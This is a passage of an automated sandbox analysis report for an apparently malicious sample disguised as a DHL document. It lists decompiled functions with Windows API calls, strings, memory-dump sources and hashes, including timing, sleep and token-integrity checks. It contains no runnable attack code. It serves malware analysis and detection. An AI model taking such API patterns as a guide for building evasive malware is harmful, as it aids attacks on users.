                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C65260
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C6526E
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C65276
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C65280
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: fc43c42bea379859beb86840930e6a28df05047296a7acf61f04f3a42b2dda7f
                                                                                        • Instruction ID: 022381ae35af169127b349133d17e2254b7f821d73f2c390b19ff6a80d8b54b4
                                                                                        • Opcode Fuzzy Hash: fc43c42bea379859beb86840930e6a28df05047296a7acf61f04f3a42b2dda7f
                                                                                        • Instruction Fuzzy Hash: B0015731D01A29DBCF10EFE4EC98AEDBB78BB09711F50045AE941F2154CB30555187A5
                                                                                        Function 00C5810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C58121
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C5812B
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5813A
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58141
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58157
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 653909e47577d29fe652c1fb7a342fe24c6c7ff9d6de86600a82f8d8ad31c44d
                                                                                        • Instruction ID: 4586bce1c62582aad47dd955e43d97fa20895ed8c8b669e2f67e73307e2891ea
                                                                                        • Opcode Fuzzy Hash: 653909e47577d29fe652c1fb7a342fe24c6c7ff9d6de86600a82f8d8ad31c44d
                                                                                        • Instruction Fuzzy Hash: 33F06275200304AFEB111FA5EC8CF6F3BACFF4A755B100029F985D6160DB619D4ADB64
                                                                                        Function 00C5C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00C5C1F7
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C5C20E
                                                                                        • MessageBeep.USER32(00000000), ref: 00C5C226
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00C5C242
                                                                                        • EndDialog.USER32(?,00000001), ref: 00C5C25C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: f2263f923f08b2cce250112fce4a2f24be78b1fe94da33068151a3bdbaeb456f
                                                                                        • Instruction ID: 3c1111ab9f54144b8c2e846722193e2dcccf8514cc34a0b25c2869432491e493
                                                                                        • Opcode Fuzzy Hash: f2263f923f08b2cce250112fce4a2f24be78b1fe94da33068151a3bdbaeb456f
                                                                                        • Instruction Fuzzy Hash: B401A234404704ABEB205B60ED8EB9A77B8BB00B06F00026DB952A14E1DBE469C99B98
                                                                                        Function 00C013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 00C013BF
                                                                                        • StrokeAndFillPath.GDI32(?,?,00C3B888,00000000,?), ref: 00C013DB
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00C013EE
                                                                                        • DeleteObject.GDI32 ref: 00C01401
                                                                                        • StrokePath.GDI32(?), ref: 00C0141C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: 61be246eea7153dba5624c3b443fcebd4d69c51da509237fe4edb99b49053967
                                                                                        • Instruction ID: fcb8948cdd007133e4b2ed505a8ce43a399ef418dee85c8b3a0c6928d34233b0
                                                                                        • Opcode Fuzzy Hash: 61be246eea7153dba5624c3b443fcebd4d69c51da509237fe4edb99b49053967
                                                                                        • Instruction Fuzzy Hash: DEF0C430044A08EFDB115F66EC4CB5C7BA5AB11726F188228E869890F1CB359AA6EF54
                                                                                        Function 00C12CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C20DB6: std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                          • Part of subcall function 00C20DB6: __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C07A51: _memmove.LIBCMT ref: 00C07AAB
                                                                                        • __swprintf.LIBCMT ref: 00C12ECD
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C12D66
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 1943609520-557222456
                                                                                        • Opcode ID: 2655cc6165bf5ea1d21f8ed75e4625123d034e60ade0aab86770a4c77a07a243
                                                                                        • Instruction ID: 7bf071bf0112d5e773e1bba2351ad0913ea4bfb6a0fce93c866922fe19af88ea
                                                                                        • Opcode Fuzzy Hash: 2655cc6165bf5ea1d21f8ed75e4625123d034e60ade0aab86770a4c77a07a243
                                                                                        • Instruction Fuzzy Hash: 169180755083159FCB14EF24D885CAFB7A8FF86710F00491DF4959B2A2DA30EE85EB52
                                                                                        Function 00C6B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C6B9BB
                                                                                        • CoCreateInstance.OLE32(00C92D6C,00000000,00000001,00C92BDC,?), ref: 00C6B9D4
                                                                                        • CoUninitialize.OLE32 ref: 00C6B9F1
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2126378814-24824748
                                                                                        • Opcode ID: 0f588c404f344f7f44417ea21e68d06cae178229301285b366c9f356b03c593f
                                                                                        • Instruction ID: 6d9081c4b350f9d481fb613b30f81edbefcef09787aed2a6d2e7cc89520d5307
                                                                                        • Opcode Fuzzy Hash: 0f588c404f344f7f44417ea21e68d06cae178229301285b366c9f356b03c593f
                                                                                        • Instruction Fuzzy Hash: 0DA11A756043059FCB14DF14C484E5ABBE5FF89314F148998F8A99B3A2CB31ED86CB91
                                                                                        Function 00C2501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00C250AD
                                                                                          • Part of subcall function 00C300F0: __87except.LIBCMT ref: 00C3012B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: 0d83b692dc46e5016bf67ff965188b3a947238420f168a842e122a0263f870a9
                                                                                        • Instruction ID: 5ae17748e1ae4c12a082581f5652851c28c43c819a11a5f18a1f8445f8983681
                                                                                        • Opcode Fuzzy Hash: 0d83b692dc46e5016bf67ff965188b3a947238420f168a842e122a0263f870a9
                                                                                        • Instruction Fuzzy Hash: A951AE72A2C60286DB11B724ED2537F3B90AB00700F308D59E4E5866A9DF358FD4EB82
                                                                                        Function 00C16192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$_memmove
                                                                                        • String ID: ERCP
                                                                                        • API String ID: 2532777613-1384759551
                                                                                        • Opcode ID: be64f6293af4e1cfddb795155818ef66e4768b73a751cc009c406546bf78219a
                                                                                        • Instruction ID: 5c10c8008a5636badd33f83002a97ef3ddf1d8b26ed099790b76c2662106a8de
                                                                                        • Opcode Fuzzy Hash: be64f6293af4e1cfddb795155818ef66e4768b73a751cc009c406546bf78219a
                                                                                        • Instruction Fuzzy Hash: B251BF71A00705DBDB24CFA5C981BEAB7F4EF05305F20856EE95ADB251E770EA84DB40
                                                                                        Function 00C87946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C8F910,00000000,?,?,?,?), ref: 00C879DF
                                                                                        • GetWindowLongW.USER32 ref: 00C879FC
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C87A0C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: 6542fbe9015a14e48765cdbb49b127658fd5228e286b13cf9e83d64b548c2556
                                                                                        • Instruction ID: 048c89f87ae92daed8eb74730132ec177f6160af06d50ab253187beff71e5cf4
                                                                                        • Opcode Fuzzy Hash: 6542fbe9015a14e48765cdbb49b127658fd5228e286b13cf9e83d64b548c2556
                                                                                        • Instruction Fuzzy Hash: 7731E331204205ABDB159F34DC45BEB77A9FB05328F204725F875A31E0E730ED519754
                                                                                        Function 00C873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C87461
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C87475
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C87499
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: 804885d708e267bf0dd6192f6cbb2d6b9e3b52d46cb162b92e5e7073f65154b5
                                                                                        • Instruction ID: 0d550082222da73ce9c68228ca7c60448834c18442cac8064382a77bbd8f841c
                                                                                        • Opcode Fuzzy Hash: 804885d708e267bf0dd6192f6cbb2d6b9e3b52d46cb162b92e5e7073f65154b5
                                                                                        • Instruction Fuzzy Hash: 66219132500218BBDF11DF94CC46FEA3B69EB88728F210214FE156B1D0EA75EC91DBA4
                                                                                        Function 00C87B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C87C4A
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C87C58
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C87C5F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: 02bdfd0b92753dbcc10df79574e75aa87c4e95e4484d97bf3c75c907f762139f
                                                                                        • Instruction ID: c611a0467992295a6a1f7625b318544aeff5793d36d3bb0ecb04943727d0add4
                                                                                        • Opcode Fuzzy Hash: 02bdfd0b92753dbcc10df79574e75aa87c4e95e4484d97bf3c75c907f762139f
                                                                                        • Instruction Fuzzy Hash: DC218EB5604208AFDB10EF24DCC1EAB77EDEF49358B240159FA119B3A1DB71EC419B64
                                                                                        Function 00C86CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C86D3B
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C86D4B
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C86D70
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: bdf326ad2219d380efa4349128e59a439ce743a0b454f954b608d4fad939108a
                                                                                        • Instruction ID: ba63dd142badeb881c8e064ab54f81a750d013880291e523897fb1d01eb60485
                                                                                        • Opcode Fuzzy Hash: bdf326ad2219d380efa4349128e59a439ce743a0b454f954b608d4fad939108a
                                                                                        • Instruction Fuzzy Hash: 34210432600118BFDF129F54CC45FBF3BBAEF89754F018128F9509B1A0C671AC5197A4
                                                                                        Function 00C58C4B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C58C6D
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C58C84
                                                                                        • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00C58CBC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 0b18c5cce932396bf22d8fd4ab28b0bc198bde3dba9f874d6f3adf58cc8fd059
                                                                                        • Instruction ID: 40254d94de8e98be649dd0a657f9686f2545eae7fe40c0fbbb87bf8fce727ac0
                                                                                        • Opcode Fuzzy Hash: 0b18c5cce932396bf22d8fd4ab28b0bc198bde3dba9f874d6f3adf58cc8fd059
                                                                                        • Instruction Fuzzy Hash: 49219F36601118BBDB10DFA8D841EAEB7BDEF44350F11055AF905E3260DA71BE89DBA8
                                                                                        Function 00C8770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C87772
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C87787
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C87794
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 341f43f314c169ab64574540258f653dedd3ab6b025f5a67b95b5b85b4be6210
                                                                                        • Instruction ID: 54aab8ac29faac20bef3cfc8d7e715e2060ab5bf52d059c9d4f83ac4482107a7
                                                                                        • Opcode Fuzzy Hash: 341f43f314c169ab64574540258f653dedd3ab6b025f5a67b95b5b85b4be6210
                                                                                        • Instruction Fuzzy Hash: C6113A32204208BFEF216F61CC01FDB7768EF88B58F110228FA51920D0D271E851DB24
                                                                                        Function 00C86920 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00C869A2
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C869B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: @U=u$edit
                                                                                        • API String ID: 2978978980-590756393
